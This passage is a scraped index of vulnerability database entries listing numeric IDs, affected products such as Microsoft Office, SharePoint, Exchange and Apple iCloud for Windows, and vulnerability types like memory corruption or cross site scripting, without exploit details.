C2R information disclosure [122874] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [122873] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R information disclosure [122872] Microsoft SharePoint Enterprise Server 2013 SP1/2016 information disclosure [122871] Microsoft PowerPoint 2010 SP2 memory corruption [122870] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [122868] Microsoft .NET Framework up to 4.7.2 information disclosure [122850] Microsoft Visual Studio 2015 Update 3/2017/2017 Version 15.8 Diagnostic Hub privilege escalation [122824] Microsoft Exchange Server Mail memory corruption [122823] Microsoft SQL Server 2016 SP1/2016 SP2/2017 memory corruption [122714] PHP up to 5.6.36/7.0.30/7.1.19/7.2.7 on Windows link_win32.c linkinfo information disclosure [121932] Cisco WebEx Teams on Windows/macOS privilege escalation [121757] Oracle Java SE 7u181/8u172 Windows DLL privilege escalation [121208] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R Attachment privilege escalation [121121] Microsoft .NET Framework up to 4.7.2 Security Feature weak authentication [121120] Microsoft Active Directory Federation Services Web Customizations cross site scripting [121118] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [121117] Microsoft Research JavaScript Cryptography Library Security Feature Incorrect Calculation [121114] Microsoft Access 2013 SP1/2016/2016 C2R memory corruption [121113] Microsoft Lync/Skype for Business privilege escalation [121106] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [121105] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [121100] Microsoft .NET Framework up to 4.7.2 privilege escalation [121098] Microsoft Office 2016/2016 C2R memory corruption [121095] Microsoft .NET Framework 4.7.2 privilege escalation [121094] Microsoft Lync/Skype for Business Security Feature 7PK Security Features [121090] Microsoft Visual Studio up to 2017 Version 15.8 Preview privilege escalation [120986] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120985] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120984] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120983] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120982] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120981] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120980] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120979] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120978] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120977] Apple iCloud up to 7.5 on Windows WebKit race condition [120976] Apple iCloud up to 7.5 on Windows WebKit 7PK Security Features [120975] Apple iCloud up to 7.5 on Windows WebKit privilege escalation [120974] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120973] Apple iCloud up to 7.5 on Windows CFNetwork privilege escalation [119805] ruby-ffi up to 1.9.23 on Windows DLL Loader privilege escalation [119568] Puppet PE Client Tools up to 16.4.5/17.3.5/18.1.1 on Windows Configuration File privilege escalation [119481] Microsoft SharePoint Enterprise Server cross site scripting [119480] Microsoft cross site scripting [119479] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 Data Processing Error [119478] Microsoft Office Web Apps Server/Office Online Server privilege escalation [119477] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [119475] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016 Attachment privilege escalation [118889] windows-latestchromedriver on Node.js Download chromedriver.exe weak encryption [118884] windows-seleniumjar on Node.js Download weak encryption [118882] windows-iedriver 2.48.0 on Node.js Download iedriverserver.exe weak encryption [118880] windows-selenium-chromedriver on Node.js Download weak encryption [118868] windows-seleniumjar-mirror on Node.js Download weak encryption [118749] Apple iCloud up to 7.4 on Windows WebKit information disclosure [118748] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118747] Apple iCloud up to 7.4 on Windows WebKit privilege escalation [118746] Apple iCloud up to 7.4 on Windows WebKit privilege escalation [118745] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118744] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118743] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118742] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118741] Apple iCloud up to 7.4 on Windows WebKit privilege escalation [118740] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118739] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118738] Apple iCloud up to 7.4 on Windows WebKit race condition [118737] Apple iCloud up to 7.4 on Windows WebKit Data Processing Error [118673] Apple macOS up to 10.13.5 Windows Server memory corruption [118238] McAfee Data Loss Prevention/DLP Endpoint on Windows privilege escalation [118120] Microsoft Office 2016 on Mac XML Data privilege escalation [117561] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1 cross site scripting [117560] Microsoft Exchange Server up to 2016 CU9 memory corruption [117559] Microsoft Exchange Server 2016 CU8/2016 CU9 Outlook Web Access privilege escalation [117505] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R information disclosure [117504] Microsoft Office 2010 SP2 information disclosure [117503] Microsoft Exchange Server 2013 CU19/2013 CU20/2016 CU8/2016 CU9 Outlook Web Access privilege escalation [117502] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016 cross site scripting [117501] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [117500] Microsoft Exchange Server 2016 CU8/2016 CU9 Outlook Web Access privilege escalation [117499] Microsoft Exchange Server up to 2016 CU9 information disclosure [117498] Microsoft Office 2016 C2R Security Feature 7PK Security Features [117497] Microsoft SharePoint Enterprise Server 2010/2013 SP1/2016 cross site scripting [117488] Microsoft Azure IoT SDK AMQP weak authentication [117479] Microsoft .NET Framework up to 4.7.1 XML Data XML External Entity [117473] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117472] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117471] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117470] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117469] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117468] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [116274] 7-zip up to 18.01 on Windows Access Restriction LsaAddAccountRights privilege escalation [116133] Microsoft Visual Studio information disclosure [116132] Microsoft Office 2016 Memory information disclosure [116051] Microsoft SharePoint Enterprise Server 2016 privilege escalation [116050] Microsoft SharePoint Enterprise Server 2010 SP2/2013/2016 privilege escalation [116049] Microsoft SharePoint Enterprise Server 2013/2016 Redirect [116046] Microsoft SharePoint Enterprise Server 2013/2016 Share privilege escalation [116023] Microsoft Office up to 2016 C2R information disclosure [116022] Microsoft Excel 2010 SP2 memory corruption [116018] Microsoft Office 2013 RT SP1/2013 SP1/2016/2016 C2R Data Processing Error [116017] Microsoft Excel up to 2016 C2R memory corruption [116016] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 Graphics privilege escalation [116015] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 memory corruption [116014] Microsoft Office 2013 RT SP1/2013 SP1/2016/2016 C2R Data Processing Error [116013] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1 memory corruption [115616] Apple iCloud up to 7.1 on Windows CFNetwork Session memory corruption [115608] Apple iCloud up to 7.1 on Windows WebKit memory corruption [115602] Apple iCloud up to 7.1 on Windows WebKit Redirect [115585] Apple iCloud up to 7.1 on Windows WebKit memory corruption [115580] Apple iCloud up to 7.1 on Windows WebKit memory corruption [115550] Apple iCloud up to 6.1 on Windows WebKit information disclosure [115488] Apple iCloud up to 7.3 on Windows WebKit information disclosure [115487] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115486] Apple iCloud up to 7.3 on Windows WebKit privilege escalation [115485] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115484] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115483] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115482] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115481] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115480] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115479] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115478] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115477] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115476] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115475] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115474] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115473] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115472] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115471] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115470] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115469] Apple iCloud up to 7.3 on Windows Security memory corruption [115445] Apple macOS up to 10.13.4 WindowServer Keylogger 7PK Security Features [115072] Philips IntelliSpace Portal 7.0.x/8.0.x Windows Permission privilege escalation [114579] Microsoft Exchange Server up to 2017 CU8 Outlook Web Access information disclosure [114574] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114573] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114571] Microsoft Exchange Server 2016 CU7/2016 CU8 Outlook Web Access information disclosure [114570] Microsoft Exchange Server 2010 SP3/2013 CU18/2013 CU19/2016 CU7/2016 CU8 Outlook Web Access Fake information disclosure [114564] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [114563] Microsoft Office 2007 SP3/2010 SP2/2013/2013 RT SP1 memory corruption [114562] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114561] Microsoft Office/SharePoint information disclosure [114560] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114559] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114558] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114557] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114556] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114555] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114554] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114553] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114552] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114551] Microsoft Excel up to 2016 C2R Security Feature 7PK Security Features [114549] Microsoft Access 2010 SP2/2013 SP1/2016 memory corruption [113330] HPE System Management Homepage up to 7.6.0 on Windows/Linux privilege escalation [113329] HPE System Management Homepage up to 7.6.0 on Windows/Linux privilege escalation [113328] HPE System Management Homepage up to 7.6.0 on Windows/Linux memory corruption [113327] HPE System Management Homepage up to 7.6.0 on Windows/Linux denial of service [113326] HPE System Management Homepage up to 7.6.0 on Windows/Linux cross site scripting [113237] Microsoft SharePoint Enterprise Server 2016 cross site scripting [113236] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [113235] Microsoft Outlook 2007 SP3/2010 SP2/2013 SP1/2016 privilege escalation [113234] Microsoft Office 2007 SP2/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [113233] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [113232] Microsoft Excel 2016 privilege escalation [113216] Microsoft Outlook 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [113124] LibreOffice up to 6.0.1 COM.MICROSOFT.WEBSERVICE File privilege escalation [112285] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [112284] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [112283] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [112282] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111912] IBM DB2 up to 9.7/10.1 FP5/10.5 FP7 on AIX/Linux/HP/Solaris/Windows Subquery OLAP privilege escalation [111580] Microsoft Office 2016 on Mac Email Attachment privilege escalation [111578] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111577] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111576] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111575] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111574] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111573] Microsoft Office 2007/2010/2013/2016 Equation Editor memory corruption [111572] Microsoft Office 2007/2010/2013/2016 Equation Editor memory corruption [111571] Microsoft SharePoint Enterprise Server 2013/2016 Access cross site scripting [111570] Microsoft Office 2007/2010/2013/2016 Equation Editor memory corruption [111569] Microsoft Office RTF memory corruption [111568] Microsoft Excel 2007/2010/2013/2016 memory corruption [111567] Microsoft Office 2010/2013/2016 memory corruption [111566] Microsoft Word 2007/2010/2013/2016 memory corruption [111565] Microsoft Word 2007/2010/2013 Email Message privilege escalation [111564] Microsoft Word 2016 memory corruption [111563] Microsoft Outlook 2007/2010/2013/2016 Email Message privilege escalation [111562] Microsoft SharePoint Server 2010/2013/2016 Web Request privilege escalation [111561] Microsoft SharePoint Server 2010/2013/2016 Web Request privilege escalation [111557] Microsoft .NET Framework up to 5.7 XML Data Processing Error [111128] Apple iCloud up to 7.1 on Windows WebKit memory corruption [110670] vBulletin up to 5.3.x on Windows directory traversal [110553] Microsoft Office 2016 C2R information disclosure [110552] Microsoft SharePoint Enterprise Server 2016 Web Request privilege escalation [110551] Microsoft Excel 2016 C2R memory corruption [110550] Microsoft PowerPoint 2013 RT SP1/2013 SP1/2016 information disclosure [110549] Microsoft Exchange Server 2016 CU6/2016 CU7 Outlook Web Access privilege escalation [109519] npm KyleRoss windows-cpu on Node.js privilege escalation [109391] Microsoft SharePoint Enterprise Server 2016 Project Server cross site request forgery [109389] Microsoft Excel 2016 Click-to-Run memory corruption [109388] Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 memory corruption [109386] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [109385] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 Security Feature Macro 7PK Security Features [109381] Microsoft Office/Word 2007 SP3/2010 SP2 memory corruption [109358] Microsoft .NET Framework 1.0/1.1/2.0 weak authentication [109273] Savitech Driver Package on Windows weak authentication [108287] Ikarus Anti Virus 2.16.7 on Windows guardxup.exe privilege escalation [107742] Microsoft Lync/Skype for Business Authentication privilege escalation [107741] Microsoft Outlook 2016 Secure Connection Mail information disclosure [107732] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [107729] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [107728] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [107727] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [107703] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [107698] Microsoft Office 2016 memory corruption [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method privilege escalation [106545] Microsoft .NET Framework up to 4.7 privilege escalation [106544] Microsoft Exchange Server 2016 Outlook Web Access cross site scripting [106531] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [106530] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [106529] Microsoft PowerPoint 2016 memory corruption [106528] Microsoft PowerPoint 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [106476] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [106475] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [106474] Microsoft Office 2016 memory corruption [106473] Microsoft SharePoint Server 2013 SP1 cross site scripting [106470] Microsoft Excel 2011 on Mac memory corruption [106455] Microsoft Exchange Server 2013/2016 information disclosure [105723] Atlassian FishEye/Crucible up to 4.4.0 on Windows MultiPathResource directory traversal [105035] Microsoft SharePoint Server 2010 SP2 cross site scripting [105008] Microsoft SQL Server 2012/2014/2016 Analysis Services information disclosure [104584] Microsoft Outlook up to 2016 C2R Document File privilege escalation [104583] Microsoft Outlook up to 2016 C2R Email privilege escalation [104582] Microsoft Outlook up to 2016 C2R Object information disclosure [104285] Apple iCloud up to 6.2.1 on Windows WebKit Web Inspector memory corruption [104284] Apple iCloud up to 6.2.1 on Windows WebKit Page Loading memory corruption [104282] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104281] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104280] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104279] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104278] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104277] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104276] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104275] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104274] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104273] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104272] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104271] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104270] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104269] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104268] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104267] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104266] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104265] Apple iCloud up to 6.2.1 on Windows libxml2 information disclosure [104264] Apple iCloud up to 6.2.1 on Windows libxml2 information disclosure [103468] Microsoft Exchange Server 2010 SP3/2013 CU16/2013 SP3/2016 CU5 Redirect [103443] Microsoft .NET Framework 4.6/4.6.1/4.6.2/4.7 privilege escalation [103434] Microsoft Office Object Data Processing Error [103433] Microsoft SharePoint privilege escalation [103426] Microsoft Exchange Server 2010 SP3/2013 CU16/2013 SP3/2016 CU5 OWA cross site scripting [103425] Microsoft Exchange Server 2010 SP3/2013 CU16/2013 SP3/2016 CU5 OWA cross site scripting [103422] Microsoft Office Object memory corruption [103421] Microsoft Office Object memory corruption [103403] Microsoft Office Object memory corruption [103214] SWFTools 2013-04-09-1007 on Windows png2swf memory corruption [103213] SWFTools 2013-04-09-1007 on Windows png2swf memory corruption [103212] SWFTools 2013-04-09-1007 on Windows png2swf memory corruption [103211] SWFTools 2013-04-09-1007 on Windows png2swf memory corruption [103145] SWFTools 2013-04-09-1007 on Windows font2swf Access Violation memory corruption [102938] Microsoft Azure AD Connect Password Writeback privilege escalation [102821] Microsoft Skype up to 7.2/7.35/7.36 RDP Clipboard MSFTEDIT.DLL memory corruption [102814] NetKVM Windows Virtio Driver IP Packet privilege escalation [102783] Microsoft Malware Protection Engine up to 1.1.13804.0 on 32-bit mpengine.dll privilege escalation [102463] Microsoft Project Server 2013 SP1 cross site scripting [102462] Microsoft Skype for Business/Lync Server HTML privilege escalation [102460] Microsoft Outlook 2016 on Mac HTML privilege escalation [102448] Microsoft SharePoint Enterprise Server 2016 Reflected cross site scripting [102447] Microsoft PowerPoint/SharePoint Server 2007 SP3 memory corruption [102446] Microsoft Office up to 2016 Data Processing Error [102445] Microsoft Office 2010 SP2/2011/2013 RT SP1/2013 SP1/2016 Data Processing Error [102444] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 Data Processing Error [102443] Microsoft Office up to 2016 Data Processing Error [102442] Microsoft Outlook 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 7PK Security Features [102441] Microsoft Outlook 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [102397] Microsoft Outlook 2010 SP1/2013 SP1/2016 DLL Loader privilege escalation [102396] Microsoft Office 2013 SP1/2016 DLL Loader privilege escalation [101949] BigTree CMS up to 4.2.18 on Windows file-browser.php directory traversal [101614] IBM Informix Open Admin Tool 11.5/11.7/12.1 on Windows privilege escalation [101356] Apple iCloud up to 6.2.0 on Windows WebKit memory corruption [101020] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [101019] Microsoft Skype for Business 2016 Data Processing Error [101018] Microsoft SharePoint 2010 SP2/2013 SP1/2016 Data Processing Error [101017] Microsoft Office 2007 SP3/2010 SP2/2016 Data Processing Error [101016] Microsoft PowerPoint 2011 on Mac memory corruption [101015] Microsoft PowerPoint 2011 on Mac memory corruption [101014] Microsoft Office 2010 SP2/2016 Data Processing Error [101013] Microsoft Office 2010 SP2/2016 privilege escalation [101012] Microsoft Office 2007 SP3/2010 SP2/2011/2013 SP1/2016 memory corruption [101003] Microsoft .NET Framework up to 4.7 Certificate Validation 7PK Security Features [100801] BMC Server Automation up to 8.6 SP1 Patch 1/8.7 Patch 2 on Windows RSCD Agent privilege escalation [99697] Microsoft SharePoint Server 2010 SP1/2010 SP2 Excel Services cross site scripting [99684] Microsoft Excel 2007 SP3/2010 SP2 Memory information disclosure [99682] Microsoft Outlook 2011 on Mac HTML Tag Validator privilege escalation [99654] Microsoft Outlook 2007 SP3/2010 SP2/2011/2013 SP1/2016 Email Message privilege escalation [99653] Microsoft Outlook 2007 SP3/2010 SP2/2011/2013 SP1/2016 Email Message memory corruption [99533] Microsoft Office 2007/2010/2013/2016 RTF Document Necurs Dridex privilege escalation [98548] ntp up to 4.2.8p9 on Windows Data Structure memory corruption [98476] Microsoft Skype 7.16.0.102 DLL Loader Skype.exe privilege escalation [98097] Microsoft IIS 7.0/7.5/8.0/8.5/10 /uncpath/ cross site scripting [98096] Microsoft Exchange 2013 SP1 cross site scripting [98095] Microsoft Lync for Mac 2011 Certificate Validation weak authentication [98094] Microsoft SharePoint Server 2013 SP1 cross site scripting [98093] Microsoft SharePoint Server/Office Web Apps 2010 SP2 information disclosure [98092] Microsoft SharePoint Server 2007 SP3 memory corruption [98091] Microsoft SharePoint Server/Office Web Apps 2010 SP2 memory corruption [98090] Microsoft SharePoint Server 2010 SP2/2013 SP1 information disclosure [98089] Microsoft Office Web Apps 2013 SP1 memory corruption [98088] Microsoft SharePoint Server 2007 SP3 memory corruption [98087] Microsoft Office 2007 SP3/2010 SP2 information disclosure [98086] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [98085] Microsoft Excel 2007 SP3 memory corruption [98084] Microsoft Word 2007 SP3/2010 SP2/2011 memory corruption [98083] Microsoft Word 2007 SP3/2010 SP2/2011 memory corruption [98082] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [98081] Microsoft Excel up to 2016 information disclosure [98080] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [98079] Microsoft Word 2016 memory corruption [98078] Microsoft Word/Excel 2007 SP3 memory corruption [98076] Microsoft Lync/Skype for Business 2010/2013/2016 Graphics Component memory corruption [98075] Microsoft Lync/Skype for Business 2010/2013/2016 GDI+ information disclosure [98074] Microsoft Lync/Skype for Business 2010/2013/2016 GDI+ information disclosure [98073] Microsoft Office 2010 SP2/Word Viewer Graphics Component privilege escalation [98072] Microsoft Office 2007 SP3/2010 SP2/Word Viewer Graphics Component memory corruption [98071] Microsoft Office 2007 SP3/2010 SP2/Word Viewer GDI+ information disclosure [98070] Microsoft Office 2007 SP3/2010 SP2/Word Viewer GDI+ information disclosure [97894] Cerberus FTP Server 8.0.10.1 on Windows Header privilege escalation [96363] MyBB/MyBB Merge System up to 1.8.7 on Windows ACP Backup information disclosure [96360] MyBB/MyBB Merge System up to 1.8.7 on Windows Style Import File privilege escalation [95957] Apple iCloud up to 6.1.0 on Windows WebKit memory corruption [95956] Apple iCloud up to 6.1.0 on Windows WebKit memory corruption [95955] Apple iCloud up to 6.1.0 on Windows WebKit memory corruption [95954] Apple iCloud up to 6.1.0 on Windows WebKit memory corruption [95781] Microsoft PowerPoint 2016 Java Embedded Object privilege escalation [95339] GStreamer up to 1.10.1 windows_icon_typefind information disclosure [95334] ntpd up to 4.2.8p8 on Windows UDP Packet denial of service [95125] Microsoft Word/SharePoint Enterprise Server 2016 Document memory corruption [94460] Microsoft .NET Framework up to <=2.0 weak encryption [94452] Microsoft Office on Mac privilege escalation [94451] Microsoft Office 2011 memory corruption [94450] Microsoft Office 2007 SP3/2010 SP2/2011 memory corruption [94449] Microsoft Office 2007 SP3/2010 SP2/2011/2013 SP1 information disclosure [94448] Microsoft Office 2007 SP3/2010 SP2/2011/2013 SP1 information disclosure [94447] Microsoft Office 2010 SP2 memory corruption [94446] Microsoft Office 2016 memory corruption [94445] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 information disclosure [94444] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 OLE DLL Loader Data Processing Error [94443] Microsoft Office up to 2016 information disclosure [94442] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [94441] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [94440] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [94439] Microsoft Office 2007 SP3/2011 information disclosure [94438] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [94341] Apple iCloud up to 6.0 on Windows Windows Security Memory information disclosure [94340] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94339] Apple iCloud up to 6.0 on Windows WebKit information disclosure [94338] Apple iCloud up to 6.0 on Windows WebKit information disclosure [94337] Apple iCloud up to 6.0 on Windows WebKit Javascript unknown vulnerability [94336] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94335] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94334] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94333] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94332] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94331] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94330] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94329] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94328] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94327] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94326] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94325] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94324] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94323] Apple iCloud up to 6.0 on Windows WebKit State information disclosure [94322] Apple iCloud up to 6.0 on Windows WebKit memory corruption [94321] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94320] Apple iCloud up to 6.0 on Windows WebKit memory corruption [94319] Apple iCloud up to 6.0 on Windows WebKit memory corruption [94318] Apple iCloud up to 6.0 on Windows WebKit memory corruption [93543] Microsoft SQL Server 2016 FILESTREAM Path information disclosure [93542] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 memory corruption [93541] Microsoft Office 2007 SP3 privilege escalation [93540] Microsoft Excel 2010 SP2/2011/2016 memory corruption [93539] Microsoft Office 2007/2010 SP2/2011 memory corruption [93538] Microsoft Office 2007/2010 SP2/2011/2013 SP1 memory corruption [93537] Microsoft Office 2007/2010 SP2/2011 information disclosure [93416] Microsoft SQL Server 2014 SP2/2016/up to 2012 SP3 Server Agent atxcore.dll privilege escalation [93415] Microsoft SQL Server 2016 MDS API cross site scripting [93414] Microsoft SQL Server up to 2012 SP3 RDBMS Engine privilege escalation [93413] Microsoft SQL Server 2016/up to 2014 SP2 RDBMS Engine privilege escalation [93412] Microsoft SQL Server 2016 RDBMS Engine privilege escalation [93396] Microsoft Office 2007/2010/2011 memory corruption [93395] Microsoft Office 2007/2010/2011 memory corruption [93394] Microsoft Office 2007/2010 memory corruption [93393] Microsoft Office up to 2016 memory corruption [93392] Microsoft Office up to 2016 memory corruption [93391] Microsoft Office up to 2016 memory corruption [93147] Apple iCloud up to 6.0 on Windows WebKit memory corruption [93146] Apple iCloud up to 6.0 on Windows WebKit User information disclosure [92584] Microsoft Office up to 2016 memory corruption [92249] Microsoft Azure Active Directory Passport up to 1.4.5/2.0.0 weak authentication [91703] Symantec Mail Security for Microsoft Exchange up to 6.5.8/7.0.4/7.5.4 RAR Decompression memory corruption [91702] Symantec Mail Security for Microsoft Exchange up to 6.5.8/7.0.4/7.5.4 RAR Decompression information disclosure [91614] VMware Workstation/Player on Windows JPEG2000 Image memory corruption [91613] VMware Workstation/Player on Windows TrueType Font memory corruption [91612] VMware Workstation/Player on Windows Cortado ThinPrint tpview.dll memory corruption [91611] VMware Workstation/Player on Windows Cortado ThinPrint memory corruption [91556] Microsoft Exchange 2016 Meeting Invation cross site scripting [91555] Microsoft Exchange 2013/2016 Link privilege escalation [91554] Microsoft Exchange 2007/2010/2013/2016 Email information disclosure [91553] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [91552] Microsoft Office 2007/2010/2013/2013 RT/2016 privilege escalation [91551] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [91550] Microsoft Office 2016 memory corruption [91549] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [91548] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [91547] Microsoft Office 2010 memory corruption [91546] Microsoft Office 2007/2010/2013/2013 RT memory corruption [91545] Microsoft Office 2007/2010 memory corruption [91544] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [91543] Microsoft Office up to 2016 memory corruption [91542] Microsoft Office 2007/2010/2013/2013 RT/2016 information disclosure [91541] Microsoft Office 2013/2016 APP-V 7PK Security Features [90706] Microsoft Office 2007/2010/2013/2013 RT Graphics memory corruption [90705] Microsoft 